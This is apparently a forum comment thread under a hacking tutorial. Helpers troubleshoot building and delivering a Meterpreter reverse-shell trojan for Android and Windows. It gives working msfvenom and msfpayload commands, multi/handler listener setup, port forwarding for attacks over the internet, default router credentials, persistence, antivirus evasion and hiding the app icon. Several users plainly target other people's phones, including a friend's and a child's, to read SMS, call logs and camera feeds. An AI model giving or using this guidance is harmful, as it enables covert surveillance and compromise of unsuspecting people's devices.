I successfully installed Kali on VirtualBox and when put the "msfpayload android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk" command, it shows me an error "bash : /root/Upgrader.apk : Permission denied"

I even tried changing the root folder properties (since am new to linux, I have a very little idea about superuser and stuff), but nothing is available in either of the folders' permissions tab. it says that I'm not the owner.

what next? help!

Hi!
?
Log into host (Kali) as root. (admin)
I mean:
Username: root
Password: "whatever you had entered" OR toor

Can i rename the .apk to anything i want ? i mean if the apk installed already . the name of apk is MainActivity can i rename it anything i want ?

Maybe yes, maybe not.
I already tried that, with many fails. Still trying...
But I don't think so, this application, every application, compiles like this by default.

when i try to run exploit command, it says unknown command.

my version of msfconsole is 4.10.0

Try run

says handler failed to bind to my ip address

Because you haven't put the hosts internal IP

when i try to scanning my phone.
i'm having this problem:

Failed to load extension: No module of the name extserverandroid.jar found.

that happens on the last par, when i type to exploit, he find the device, but it doesn't scann. forgive me my poor english.

I cannot open the Main Activity app in android while trying to hack my own phone. Also, when I put my LHOST Ip and port in the form 192.168.x.xxx:pppp, it loads. while it loads, the msfconsole says the session is running(i can't execute commands) and when it stops loading it says session died. When I reload it, it does not connect. Please Help

Hi,

Main activity application opens and remains running in the background, so don't worry. And the station dies because of antivirus (specially if it's inbuilt)

Thanks for this post
Is there a way to force a device to install the file could it be done /
i dont intend to do it that way but im just curious

Yes!, use scripts, {I haven't tried that before, I think maybe we will need root to FORCE install it (or maybe not)}

Hey Dear F.E.A.R,
I did anything you did exactly but when I open the trojan in my android device it is showing me this on the msfconsole:

Like, Its trying to connect but without a success.
thanks for your tutorial btw^

Hmm..
Androids are being upgraded to 5.0.2 (i.e. lollipop).
So I see most of the people are getting errors, while exploiting them.
Like session dies immediately etc.
You/We need to upgrade, our Kali too (New version 1.1.0)
And then use the upgraded metasploit-framework.

i meant to reply to you :D

thx for answer,
Is it able to update the kali for the kali itslef?
from something like and apt-get update or something
thx^^

Yes why not!
Type this in a terminal:
rm -rf /var/lib/apt/lists
apt-get upgrade
apt-get update
apt-get dist-upgrade
--------OR-------
To do everything simultaneously type:
rm -rf /var/lib/apt/lists
apt-get upgrade && apt-get update && apt-get dist-upgrade
Reboot when completed.
(If an error occurs then, reply, which I think will)

Ok , Ill try it and reply!
Thx!

Hey F.E.A.R ,
The Update
Another thing , Can you explain me how to port forwarding?
I want it to work on wan , and after I port forward can Trojans like shikataganai work on my friends pc's ?
thx

For that I'll need your router's Company name, Model No. (And version if any)

its NetGear VEGN2610,

I've seen some ways to portforward but it requires a username and password that when I tried to get in it wasnt admin and password

Then try these:

1. Admin Password
2. admim Password
3. Admin password
4. admin pass
5. admin admin

If they don't work press your router's hard reset button, to switch the password to the default

To port forward: follow this guide: here

Add 2 services one with port 4444 and the other with 8080.
Then goto firewall rules, and allow these services through.
(Choose 'any' everywhere except Logs, keep the logs to 'never')
Also, in the inbound rules (of firewall rules) put the Kali/Host's Internal IP address.
Also don't use any port checker tool to see if the ports are forwarded, just try a hack.

ok great thx I have hard reset the modem
and I did it all , now only to try the wan backdoor :D
thanks

There is a start port and a finish port ,
what do they mean?

That means the range of ports that has to be forwarded.
Just put port 4444 into both of them.

I'm failing to change the inbound rules too because it asks for a vaild service and I dont know what does it mean

First select the service you created, then edit it's inbound and outbound rules.

Hey ,
I didnt found the place to write the Kali/Host's Internal IP address. And for the ports ,

Is that the way that supposed to be?

thanks^

Yes because you have only configured the outbound rules.
Do you see that link below in the screenshot ?
That states: " Click here to set up inbound...."
When you set up inbound rules, then you will be asked for Kali's IP.

ohhhhh thanks!
the kali ip that I need to insert is the lan ip?
something like 10.0.0.6
thx

Yes, use the cmd: ifconfig to confirm the IP.
Make SURE it is static or you will have to change in the inbound rules again whenever you try to hack on WAN.
Welcome!

What do you mean make sure its static?
like how do I make sure of it , it is always the same 10.0.0.6
when I write ifconfig
:D
thx

btw the trojan is again not working showing the same problem like trying to connect but with no success even though I've upgraded the kali

Now, upgrade metasploit framework: msfupdate

btw for the update it worked fine

Good to hear that!

Another question ,
How do I remove the Persistence from the phone?

Reboot the phone (if not followed the method, which needs root) or Kill the script from tasks killer (I recommend rebooting)

Tomer:
(Replying here as there was no space for another reply left)
OK don't go into that topic, just make sure it is the same every time you start the hacking procedure.
If it changes sometime, just use this cmd to change it back:

• ifconfig eth0 10.0.0.6 (if you are using Ethernet connection(wired one))
• ifconfig wlan0 10.0.0.6 (if you are connected using wireless connection)

---
Now that you have done all the configurations, why not test them, hack an android over the Internet!

okiii,
Thx for great communication :D
Omw to hack over the internet!

Welcome friend,
:)

Hi I have done this and I was able to hack android jellybean but when I tried on android kitkat its not working when I try to take a webcam snap it shows error is there any way for doing that

Hi Amal,
Read the above comment
/\
|

I have just downloaded the kali-linux-1.1.0a ISO 32bit and installed it on VM but this hack does'nt work in that it always shows error. please help

Which error does it show?, I want you to be specific, so that I can help you.
And, you didn't had to download the whole new version of the host, you could have simply updated it, but never mind.

I am using tplink router ...i am having a tough time forwarding...

Be specific, model no.?

Iam getting this error while doing this. What can I do with this please help F.E.A.R

Is the connection stable? (That your session doesn't die frequently)
Try this:
webcam_snap 1 -i
webcam_snap 2 -i
Or maybe the application is denied from accessing the camera internally.

Just a simple question cuz i'm just a beginner,
if the victims removed the apk after opening it.. will I still be able to access their phone or is it hard to remove ?

A simple answer:
If the victim removes the setup apk then the session remains.
If the victim removes the installed application (Main Activity) then the session will die.
Really easy to remove like any other application.

yes my connection is stable and I have hacked the same phone in Kali 1.0.7 version but its not able to hack now in kali 1.1.0a I have tried those two commands but its not working which version of metasploit and kali are you using.

Don't worry about me I corrupted my Kali.
Update your metasploit: msfupdate

I get this on the first step :
The utility msfpayload is deprecated !

& also how do i write the external IP if it changes occasionally ( i don't know about port forwarding )

I'm really a begginer :D

Use this command (tested at last):

• msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
• Ignore the errors.
• Go to The root/home folder, right click on the .apk
• Click Properties, go to permissions tab.
• Tick the check-box for 'Allow executing file as a program'
• And then, I think you know what to do... (follow the remaining guide)

First finish/complete the hack test on LAN, then run after WAN, instead of just jumping to it. :) (step-by-step progression)

• To check your external IP, type this on Google (/default search engine):
• "What's my IP"
• For Port Forwarding, first search about it, on a search engine, then give your Router's Company's Name and Model No. (And version if any).

All is well that ends well :D

It's working on both now, thanks a lot.

I just have a problem with streaming & taking a snapshot but it's not a big deal. :)

Good to hear that! ;)
And you are welcome!
(In-built antivirus block the application from turning on camera/using camera)

hello sir i am not able to understand the method clearly. i have done step by step but still i am not able to get connection.firstly i have some questions:-.1-i am using kali linux on vmware and using wifi modem so is it any problem, do i have to make changes in my wifi modem ? 2.-i dont know what to set at port so i set 80 but it wont work.3- i am using my private ip address at Lhost and lport-80 its not working. plz help

i am using tp-link modem. -model no-Model No. TL-WR740N / TL-WR740ND

Hello Mayank,
Welcome to Null-Byte,
First, which method are you using LAN or WAN (Internet), if LAN then I'll answer your questions like this:
1) Yes you have to, but not in your Wi-Fi.

• Go to settings of the Virtual Machine and Change the Network Adapter settings to Bridged (Automatic)
• Turn off any firewalls (except windows firewall)

) Don't set any LPORTS anywhere, let the machine stick to the default one (4444)
3) Keep using the Private IP of host machine i.e. Kali (not windows)
---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

I have tried the LAN method and success fully gained access.
I will try the wan method
But PLEASE let me know the list of command that we can perform android devices
Thankyou... Thankyou.

Hi Jessy, Welcome to Null-Byte,
When you get the meterpreter session, type:
help or ?
You'll get all the commands, that you want to know.

---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

1. yes android device is connected to same wifi network.
2. yes i created .apk ,installed and when opened on my android phone shows only one option "reverse tcp "thats it
3. no sir i m new to linux world

For 2) What? the application is not meant to open, it just runs in the background.
For 3) First you should try hacking a PC (Hack the same Windows on which VMware is installed)
Create the executable file:

• msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.4 X > /root/hi.exe

Set-up the listener:

• msfconsole
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST 192.168.0.4
• exploit

Copy and open/run the file on Windows.

installing kali linux in vmware(virtual machine) is the main problem ? or
should i install kali liunx directly to pc(dual boot )

No, there are complications, but when you get practice, it works fine.
If you want the easy way, then yes go for dual boot.

as i simply installed kali linux on vmware.; i think i need to setup some network setting or some other settings on my kali linux or vmware . can u tell me what should i do after installing kali linux. or some settings

i think i have some problem in networking as i am unable to get back or receive data from victim device

plz suggest some links or others solve the networking problem

I already told you,
Check my reply to your first comment.
Also, I think you should go for dual boot, that's better for you.

Albeit not known as a dumb blonde, I wave the white flag....
Is there someone that can help me, perhaps on a independent consultant basis?
I appreciate any feedback or direction....

HEY !
when i run the msfpayload command, it says:
Invalid payload: android/meterpreter/reversetcp (i typed it with the underscore in the command,though)

pls help me with this, thanks !

Because, you are using Backtrack.

nope, i'm using it in kali ! i guess its v1.0.2

Update Kali

Hey F.E.A.R.
is it bcause the android sub-directory is missing in the payload directory ?
the payload direc goes like:
aix
bsd
java
linux
..
it has windows too, but no android !
i tried doing this with armitage, same error !

It should fix the missing payload after update

hi...can u help hack an android phone ....i have no idea,and i need someone to do it to me please

... The tutorial was made for the same purpose...
Sorry I can't help any further, you are on your own...

Android 5.x.x have been giving out the parsing error usually associated with unchecking unchecking the allow installation from unknown sources check box. This is causing my two most common RATS to be impossibly to install on devices. could it be that one like your self has a solution.

Hi.
Imagin that i have access too somebody's phone.
Can I hack and have access to his phone by this way even he is not connected to my wifi(Lhost ip)?
Thanks.

Hi

Imagin that I have access to somebody's phone and i can install that application that you made. Is it possible to hack and have remote access to his phone even if he is not connected to my wifi(Lhost ip)?

Thanks

Yes surely,
I have mentioned it as the WAN method, go through the tutorial again.

Hi Fear, thanks for this tutorial! I have it working almost fully now. However, I can only access cam and microphone. The android commands to get sms and call log, etc are not there. Is there something more I need to update?

"are not there" what do you mean by that?
'Are not there' when you type help (or ?) ?
EDIT: Oh, and Hi Stv

Thanks for the response! Yes. I also watched a video about this and could see on his screen that there was another section in help titled "Android Tools" with dumpcalllog, checkroot, dumpcontacts, dumpsms, and geolocate. I don't have that section, and those commands do not work if I try to use them. I am connected though and can get screenshots.

Hi.

You said that if the victim open the trojan we are able too do somethings with him or her phone. Imagin that he open the app and after that he close it. Would I be able too access too his phone after he closed it.

(Answer in two situations please.1. If he close it on recent apps or 2.if he just come out of the app(not close it in recent apps)).

Thanks alot for your help.

Hi there,

Sometimes you should try and experiment on these things, and the question you asked proves that you haven't even tried it.

1) The app opens and runs in the background and cannot be closed.
2) If it is closed through recent apps menu, even then the session doesn't die.
3) For terminating the session, you have to kill the app from task killer or reboot the android.

Also, I would like to be able to leave the session and then return later, as in turn off my computer and re-access the same device remotely tomorrow. Is that possible?

Thanks!

Yes, it sure is!

Hey fear, I am kind of surprised that no one else is having issues installing backdoors on android devices with running 5.x.x

The error is always a parsing type and I know that the error is 5.x.x specific because I previously tested the metasploit android reverse tcp back door on the device, but after an update from 4.4 kitkat to 5.0.2 lolipop,, all successive installation attempts have failed.

I don't have any errors while exploiting 5.0.x. Only that the session dies quite quickly.
Have you updated you Kali?
Edit: your*

Yes I have but i will attempt to update it again.

I ve got a little problem ... I do everything as said but when I exploit it doesn't give the same result as yours. I did this three times but I still get the same result. Can you tell me what am I doing wrong?

Are you sure the LHOST is of Kali's?
Check it using the cmd: ifconfig

i tried this on my friend's phone whho was connected on my network . it says "can't open file" please help

What says...? Details please

I'm getting a permission denied right after entering the Trojan. Any thoughts? I'm operating as standard non-root user.

Entering the trojan? Putting it into the android? Do you get this error from the android?

Comment Deleted.

No you don't

Hey and how do we encrypt it so that it bypasses AV detection?

I don't think there is an option for encrypting the .apks directly (yet). Instead you have to decompile and dissect it, then encrypt it.

Instead of doing that all, I suggest you to try the hack, I am sure the application will not get detected by (external) AVs.

Also, Welcome the Null-Byte.

Thanks :D NullByte is really an amazing place..

hai,

i followed this article to hack my android device .... but i was not successful in hacking it.

i was struck near "Sending stage (769536 bytes) to 192.168.1.4
please help me thanks in advance

Hi,
Yes, that happened with me too, (I forgot the soution xD),
I think it had happened because the file (.apk) was malformed.
You might have used -X instead of -R (template).

Hi,

I follow all the steps but when I go to install the .apk on my phone (as test) it says . "Parse error. There was a problem parsing the package." can anyone help me? I tried changing the permissions in the file to create as an executable .apk but still nothing. I even tried msfvenom and everything but didn't work either.

Can u post the command u used to make payload??

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
Ignore the errors etc, the application will still be created.

Okay, I haven't updated my android to the latest, but it is lollipop, and the hack works perfectly.
Will let you know once I update it, until then try for other androids.

hello f.e.a.r,
i created the apk over my wan ip and whn i tried to install the apk on my phn it shows me this error.. hope u will help me. :)

Yea can u post the command u used to make apk??

Above

no lol i know about it... i was asking them those who get the errors to post the command so we can check for any errors...

lol I thought you mistakenly replied to them instead of me

msfpayload android/meterpreter/reversetcp LHOSTS xxx.xx.xx.xx R > updater.apk

1. Check that unknown sources is ticked
2. Copy the apk to windows and then copy it to your mobile to check if the apk was copied correctly as kali can be sometimes frustrating to copy to android

If that doesn't work then its your android os version.. maybe its too high... nothing can be done... try msfvenom once with hope;);)

sign the apk file

Hi

am unable to proceed further after exploit .... am using kali linux on virtualBox

yeah same problm m facing.. whn i switched my pc.. the abhove problm i was facing on my laptop.

1. This maybe because default port set in kali is 4444... so if u hadnt set it to 8080 it wont work..
2. Try portforward ports
3. First run exploit command in console then open the app in phone... if u have already opened then close it then reopen the app again

Else it will just be your vm... it cant access it... search google maybe

Use VMware instead.

hi thanks for the reply. i have set port to 8080. now i installed VMware but still am facing same problem.
-> i have set network to bridge(automatic). also tried by keeping at NAT
-> updated kali
-> used msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 LPORT=8080 X > /root/test.exe
and also i tired
msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 X > /root/test.exe

i have dynamic ip and am using wifi to my pc. am using tenda N301 wi-fi.

Damn the posts here guys!!! Sooooo many... it rakes 20 seconds just to hyperscroll to down here lol ;);)

I kniw this post just increades the length... lol .. =.=

(Intense laughter) xD

I did all the things and everything worked fine till i tried to open the apk it says it can't open the file(I have enabled Unknown sources). I'm using CyanogenOS12 based on Lollipop. Someone help please.

It works on that ROM perfectly, try another better file manager and then open/install the apk.

It works now :) thanks :D

You are welcome :)

Just sent you Inbox F.E.A.R.

hi thanks for the reply. i have set port to 8080. now i installed VMware but still am facing same problem.
-> i have set network to bridge(automatic). also tried by keeping at NAT
-> updated kali
-> used msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 LPORT=8080 X > /root/test.exe
and also i tired
msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 X > /root/test.exe

i have dynamic ip and am using wifi to my pc. am using tenda N301 wi-fi.

Can your vm connect to Internet??

yes vm can connect to internet

Type and run exploit... then run the exe as admin...
Try port 4444
Disable antivirus...
Is vm on same machine??
Try putting public ip in lhost when making exploit and using local ip when running exploit

Remember lhost is the ip of kali system... not windows... also check if your kali and windows hace same local ip.. could be a problem

i'm confused in the ip's here...

i have a 24 online client net broadband connection . i use it in a wireless router. to access the net i have to use the below IPv4 ip as without it i cant login to the 24 client page.

i am using kali Via VMwaer. by using command ifconfig i get the below ip's.

while googling my ip i get a different result.

can u tell me which ip i have to in 1st LHOST and 2nd LHOST...

The one you see on google is your public ip.. for the world...

The on you see on ipv4 is local ip.. for your wifi modem... if you type ifconfig in terminal youll get sane ip as ipv4 ..ie... local ip..

1) if youre hacking someone connected to wifi youre connected to.. then use local ip everywhere... the ipv4 one...

2) if youre hacking someone who is not connected to your wifi at the moment... then when you create the payload using msfpayload or venom... use lhost as the publib ip or the ip you got on google...

But when youll type use payload and then specify the local ip then tyoe exploit... ;);)

ok so as starting im try to hack my own phone here. so lets say i am using data carrier on it not wifi.
now as from the above pics. can u tell which ip to be used there ?
i do get the while creating the payload the one i have googled will be used (if i got it correct :p)
but in second one. can u tell my ip to be used here ?

Inet addr : 192.168.163.129

ok. i will try with this :)
thanx :)

ok.. so i did as everything told above.
gave the commands.

started console
and

installed the app on my phone but after i run the apk the blinking of this rectangular dot stops and nothing happens next. help me please !!!!!!!

Dragon,
At least try the hack on LAN first. (Put your internal IP in 'both' LHOSTS)

Deleted

oki i tried with the LAN, and ip used the one i get after typing command ifconfig

created the payload without using LPORT and got into the console mode

used the exploit handler with the same commands as described and the same IP used above.

but same thing happened this time also. nothing happened after this. :(
what now :o

one more thing. i had gone through the above comments and noticed that u told people to use Bridge Mode rather than using nat . well i cant access net in bridge mode even after ticking the option given below it. Does it has to do something with opening of meterpreter session ?

i even tried manually selecting only my lan connection , still no use ... :(

Hey F.E.A.R. i cant use bridge mod on lan but it working with WAN somehow , so i gave it a try ...
first i tried normally without port forwarding and it again struck on starting payload handler.

then i pot forwarded 4444 and 8080

and it worked ... it started the meterpreter session. but no command works in it. moreover the session automatically closes in few seconds :(

help me please ... :(

LAN strucks on starting payload handler and WAN you can see yourself :(

Hi DRAGON,

I think you are on the right track. Your port is actually listening for a connection. So, all you need to do is install the apk on the victim's phone and launch the app called "Main Activity"

In the terminal (msfconsole), you'll see
#Meterpreter session 1 opened (IP:PORT...) then run any command, e.g dumpsms

actually thats the real problem... i installed the main activity app but nothing happens... in phone the app closes automatically and runs in the background. but in my vmware nothing happens :(

Don't set any LPORTS

Hi F.E.A.R

I'll try to be very specific to my issue in the hope that I'll get a quick response to solve my problem. My computer uses my phone's tethered Wifi, and it's IP (the one I get from Settings > About phone > Status) begins with 154.122.XXX.XXX and is dynamic. It is the same one I get when I go to www.whatsmyip.com. First question, is this the public IP of my android phone? If so, where do I get the phone's internal IP?

When I run 'ifconfig' on terminal I get a static IP that goes 192.168.43.XX. This does not change despite the other one mentioned earlier changing each time I turn on Wifi tethering. So, is it (192.168.43.XX) my Kali's internal IP? If yes, where do I get its external IP?

Lastly and most importantly, there is dire need for me to go outside my network this time, and with a payload that will be persistent. Please, could you answer my above questions about IP and give me the command to create a persistent payload that will work on WAN?

I would really appreciate it.

Hi Walter,
Do not jump start, first try it out on LAN, and if your PC is tethered that means the systems are operating on LAN.

Yes, 154.122... is your android's external IP, which you don't need or need to care about.

Look for internal IP, open WiFi settings, and from the options menu, you will get the details of the network. (Internal IP etc..)

For kali, you already know the Internal IP i.e. 192.168... However for external IP, simply open a browser, and visit the same website you mentioned above.

it is too hard do this hacking with dynamic IP :(

Its the same as lan... nothing different just 1 lhost lol...
If you dont use vm and dualboot kali like I did... everything will be easy as pie.. ;);)

Thanks F.E.A.R, but I already bought a TP_LINK TL-MR3220 and I'm having trouble configuring port forwarding, especially setting up a static IP for Kali. I at first thought I could just go to IP Reservation settings on my router or bind an IP to my MAC address and that would be all, but I still saw my IP from ifconfig changing.

Guys, my ultimate goal is to run a reverse TCP on a device that is not connected to my network, Any help?
Again...any idea how to post on this site?

When youre making payload... in the lhost you type your public ip... the one you can search for on google...
Then when you use multihandler... there you enter lhost as the ip you get in ifconfig.. ie... your local ip...
Run exploit and run the apk on device not connected to your network...
Enjoy..;);)

I am doing the same,but stuck on "starting the payload handler".
can you help me in resolving the issue..

hi i have android 5.0.2 and i am also facing same problem like dragon my i tried both the ip but still my metasploit stuck in

starting payload handler......

i cant move forward any help needed...

Try bridge mode rather than nat...
Try nor setting any lport ..

I strongly suggest using dualboot kali (personal preference) as it doesnt give these hassles.. ;):)

i tried with both vm and with kali installed alongside windows.. but having same issues.. my phone is running with kitkat version. and i am able to install the app successfully.

Please tell me how to port forward in zte router thanks

You need to login to your router...
There will be an iption called portforward or nat in the menu..

Default username and password is admin.. admin and admin..password...
You can search for your router... just type on google your router model and after a space portforwarding ;);)

hi FEAR,
can this method also be used for devices not connected to same network,i.e for devices over the internet..??
if that's possible,how can that be done,i tried it but stuck on "starting the payload handler".

You need to put your public ip when youre making the payload....
But when youre exploiting.. then you enter your local ip ;);)

HELP!
i tried the msfpayload line i got and error message
bash: msfpayload: command not found
why is it not working on my machine?

Msfpayload is discontinued
It has been replaced by msfvenom. .
So you need to use msfvenom.. its almost same..

okay, thanks ACE

following the tutorial, you mean i should change msfpayload to msfvenom:
msfvenom android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk
i tried it, got the reply 'no options' msfvenom- a metasploit standalone payload generator

use msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

it says invalid payload selected..!

Because It is: reverse_tcp

sorry sir.may i ask.why when install apk in android i get error " there was a problem parsing the package?? someone help me please...

Yea use a different file browser... ;);)

what do u mean about difference file browser.explain please.

it doesnt work on lolipop. and leads on how to make it work on lolipop

HELp????

Hi F.E.A.R. !

It working well on local network but i want to do this ''through internet''. I haven't router. My network cable is directly connected on my laptop. I don't know how to port forward in this situation. can you help me? Thanks for this lession!

Step 1. Go to: Control Panel -> Network and Internet -> Network and Sharing Center.

Step 2. Click on: Manage Network Connections -> Right-click on Local Area Connection -> Properties.

Step 3. Click on: Sharing -> Check off; Allow other network users to connect... and Allow other network users to control... boxes -> Settings -> Add a name -> Add your IP -> Then the port you want to open.

... add a port exception in your firewall too!!
Ahave fun ;);)

Se7enPe ACe I am assuming you do that if you wan to send it to the victim who is far way from you? One question do I have install in my phone first and then sent it to the victim? Let's say my kid is 15 blocks from me at school. How do I send the apk to him?

Install my phone and sent it my text? That will be too obvious.

Hmmm...This got me thinking, would it be possible to use a similar method (upload an apk to root directory) to MANUALLY "inject" su into the root directory? Thereby at least obtaining the su binary inside the /root folder, and subsequently (somehow) gaining root access? Even if just temporary, its a start!

Before everyone starts with the "You know how many 'one clicks' exist, right?" I have VERIZON...and I really don't want to deal with the whole java card deal. Plus, I love hacking stuff...always enjoy the challenge - this one just has me stumped.

• HTC One M9 on 5.0.1
• Kernel 3.10.49
• Build 1.33.605.15 CL511781 Release Keys

(F14.VZW.HTC6535LVW.0)

Anyone have any thoughts or a possible direction to point towards?

No, you can't , until:

1. You use 'adb-scripts' to exploit and root the android during boot/fast-boot/download mode.
2. During boot we have system privileges, almost like windows.
3. The device should not be in use during this or...

(Not tested, should work.)

I like your creative thinking, but (1) if you were to "inject' su, then it would be in /bin directory nor /root directory and (2) you would need root privileges to install it and have it do what we expect it to do, give us root privileges.

I'm not sure what you are trying to do?

OTW-

My end goal is to have persistent root access to the supposed "unrootable" VERIZON HTC One M9 (nothing in this world is unhackable if you ask me).

I would need to gain "s-off" (security off) to maintain said root access, but I don't even know where to start with that, one thing at I time I say.

And yes, thanks for correcting my mistake, it would reside in the /bin folder (since su binary is what i'm trying to use....I guess thats the way lol). I'm entering into uncharted territory for myself with trying to change phone permissions without having the necessary permission to actually change the permission in the first place; ie "fake-root" or, pseudo sudo LOL (still with me there?lol), but from the looks, not very different from most nix systems ive come across. I just want to root my phone manually since I cant figure it out, ive come looking for help.

I've obtained "The Hacking Team's" Android Exploit Network/Framework but looking through it, it just looks like my / folder (bin,etc,opt,mnt,usr,share...etc) that has all the exploits burried into a www folder with a server download and some php/batch? scripts.

Should I start a new thread or something? Any places to look for advice on how to do this?

Hello, I understand that this is an old topic and that I might not get a reply, but I would like to ask one anyway.

I'm working behind a corporate firewall that is basically made up of one proxy server. How would I connect back to my laptop from the phone I am trying to exploit? The only external IP I can see is the proxy server's and I cannot use the internet if I do not use it.

Also, I've noticed that on Lollipop (my phone is a rooted LG G3 D855 (International Model) running Euphoria ROM (5.0.2)), the app can easily be seen on the menu screen of my phone. Any ideas on how I could hide it?

Thanks

Ninja243

please tell me FEAR how to port forward on beetel 220BXI adsl2+modem ??

www.portforward.com

yeah thanks i got it .

when making Trojan file it shows up
The utility msfpayload is deprecated!
It will be remove in or about 2015-06-08
Please use msfvenom instead
Any help?

msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

Use msfvenom. Check out my tutorial on using msfvenom here.

Dear OCCUPYT
I am a newbie here. Can you please tell me where to find the ip for LHOST?

the LHOST is going to be your private IP address which can be queried by typing 'ifconfig' into your kali terminal.

LHOST is your IP address. Find it by typing:

ip addr

and hitting enter.

Ninja243

Type ifconfig

i have install the main activity in my android.it only work on webcamsnap. when i type help, no android command found in cmd and because of that i can not run dumpcalllog command. what should i do? help....

OTW-

My reply was swept away by an odd influx of replies to the topic; I say odd because most questions had already been answered, and, more importantly, take a look at the accounts of Ninja243 and ALI ZAIN - their comments on here are their ONLY comments ever made, which begs me to ask the question, wouldn't google have been quicker than signing up and confirming an account?

I hate to assume this, but it appears i've been TROLLED! (BTW, I'm Way off topic: BUT this just raises my suspicions even more re: the gov't/bigCorp paid trolls whose sole job is to derail topics that "The All Seeing Eye" deems inappropriate...I'll step down from my random mini soap-box, apologies for the rant).

I would appreciate your invaluable insight, OTW, it seems as though some others would rather it not be given...but i'm just a mad hatter so what do I know?

Sorry bro, I've only seen your comment now, but the reason that I've only commented on this post is really just because I was stumped and that I am new to Null-Byte in general. I guess you could see this as an opportunity that I took that seems to be working. Sorry if that weirded you out in any way.

Ninja243

Gametime:

First, I think you are being a bit paranoid. Paranoia in our field can be a good thing, but I think you are letting it get out of control in this matter.

Second, I have read your question again and I'm not sure what your question is other than "should I start another thread?". That might be a good idea so that I am others can understand what you are after.

OTW

@GameTime is this a 999 issue you speak of?

@CYBERHIT

I don't know what a "999" issue is. Besides my paranoid interpretation of an upside-down "666"...which is THE MARK OF THE BEAST!!! Lol. I'm paranoid, yes...delusional...not quite.

@OTW
Thanks mate, I understand that some things aren't meant for public forum.

As far as my paranoia, I was up all night studying for another CompTIA certification (which I passed BTW, whoop whoop) so maybe I was a little bit more paranoid than usual.

This "new thread" has sense been created so maybe I will have a bit more luck there...

Lastly, that's really all you got from my inquiry? Whether or not to start a new thread? I'da pegged you for a thinker! I'm only kidding. Thanks for the reply.

How big is this payload supposed to be? I've used the exact same commands as stated above (in the tutorial), but the .apk file always seems to be 0 bytes big. I tried opening it with leafpad, but it seems empty. Any ideas?

Still waiting

Ninja243

Without any encoding.. it will be about 8 kb..

Thank You for attending to the comments here, 7.

Are you actually thanking me... or is it sarcasm like the rest of em??

...

I have been busy lately and even will be for 2 years, and there are people who want there comments to be attended to.. While I was not present, I see you have done a great job. I wish if you could continue it.

So that's why, Thank You!
Edit: Even the others(Energy Wolf, OTW...)

Oh really??
No thanks man.. at least you appreciate me.. unlike others...

Well, I've tried multiple times to create the payload and it keeps ending up as an empty .apk file. The code I use is:

msfvenom -p android/meterpreter/reversetcp LHOST={IP} R > /root/CandyCrush.apk

What am I doing wrong?

Ninja243

Syntax error..
THIS:

msfvenom -p android/meterpreter/reversetcp LHOST=(YOUR IP) R > (ANY NAME).apk

If you still get a apk of 0 bytes then they may be a problem in your IP (LIKE IN MY CASE). I'm pretty sure you're using vmware, in which network problems are common. Make sure to edit your network connection from NAT to Bridged from vmware settings menu and then connect to the wifi. Open cmd and enter ifconfig. If you get a new IP try that, if its the same try with it again maybe it'll work!

The syntax is right man...

Oh yeah sorry! I thought the underscore mattered.

Is there any error youre getting when running the command??
If not.. then maybe its just too small and not empty... try to install it in phone..

Alright, I've tried running it on my phone (after disabling my firewall) and nothing happens. I've looked at netstat using my phone's terminal and the .apk doesn't even seem to be running (which I found out using top).

I looked at the .apk file using FX File Explorer (which is pretty awesome by the way), and all of the 5 apk files I made were completely empty (which I find weird because something installed).

Has someone backdoored a metasploit payload?
Is that even possible, and if so, how?

Thanks, Ninja243

Edit: I am running a custom ROM on my LG G3, could that be complicating things?

Just give me/us the lhost, I'll create it for you for testing purpose.
(If you trust me of course, which I won't recommend)

Haha, thanks for the offer, but I cannot do that. Not only because of the obvious security implications, but also because of how the corporate firewall that I am using is set up.

Thanks for the help

Ninja243

Mayne you didnt make payload correctly.. it has to be about 8 kb... make sure you type everything correctly. .
Also just start multi handler and check if its working rather than checking netstat..

i have also tried that script of msfvenom but that script is about 0kb but msfpayload is of 8 kb their is error or what ?

Hey, I just wanted to know that how can I keep the app icon hidden after installing? And also how can I make the app auto start after a time period so that I don't have to wait for the the victim to open the app?

BTW, very nice article.

Hello,
You mean persistence?
Here...
(The script is unstable in lollipop)

a single problem: When I try to install it on the phone it always says App not installed while installing. Install from foreign sources is enabled. Any ideas?

Use this command for .apk creation:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(internal ip if LAN or public ip if WAN) R > /root/Upgrader.apk

Possibly the apk outputted as 0 bytes. Check whether if it's of some kb (around 7.5 kb) or 0 kb.

Make sure you dont do spelling mistakes.. and make sure you type your ip correct.. and mind the case sensitive

NE PI, Try signing the apk manually. https://developer.android.com/tools/publishing/app-signing.html#signing-manually

That was it. I signed the app with d2j apk sign and it worked.thanks

every time i boot into kali , to connect to the victim i have to start msf and enter the commands from : "use exploit/multi/handler" , and is there unethical way to make public ip static because it changes every time i log into the pc.. will cahnging of public ip cause any problem to connect the payload back to host?

A quick search on google "make ip static kali linux" will help.

No thats wrong...
Thats your private ip.. not public...

To get a public ip you need to contact your isp or buy a vpn.. you can also use a dynamic dns..

To enable the DMZ feature should we put our internal ip address?

Yes, Kali's (system)

Hi Fear. I tried the attack at a WAN level. I even installed the apk file onto my android phone but there is no change in msfconsole. It's stuck on "Starting the payload handler". Any idea? Does it not work on Android 5.1? Do i need to disable my anti virus on my phone or something?

Did you forwarded your ports?

When i open my app it just get closed what should i do
